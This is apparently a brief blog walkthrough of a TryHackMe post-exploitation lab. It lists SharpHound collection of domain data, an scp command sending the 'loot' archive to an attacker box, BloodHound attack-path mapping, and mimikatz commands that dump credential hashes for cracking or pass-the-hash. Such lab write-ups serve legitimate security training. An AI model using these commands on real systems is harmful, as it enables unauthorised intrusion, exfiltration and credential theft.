Bloodhounds and Mimikatz

In this post we will follow the TryHackMe room Post-Exploitation BasicsThis room takes us through some techniques red-teamers and APTs use once they have infiltrated a network. These Techniques include the use of tools such as Sharphound, bloodhound, mimikatz, and many more.

 

Sharphound to loot the domain controller

Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

SCP to send the file back to your attack box

scp -rv C:\Users\Administrator\20230310010622_loot.zip root@10.10.0.0:/home

On your attack box, start bloodhound

bloodhound

Import your loot into bloodhound and use the queries to generate your attack paths

Now we run Mimikatz to get into our target admin accounts

.\mimikatz.exe

Use privelege debug to run as administrator

privilege::debug

then we dump hashes

lsadump::lsa /patch

Now we can either crack the hashes or use mimikatz to pass-the-hash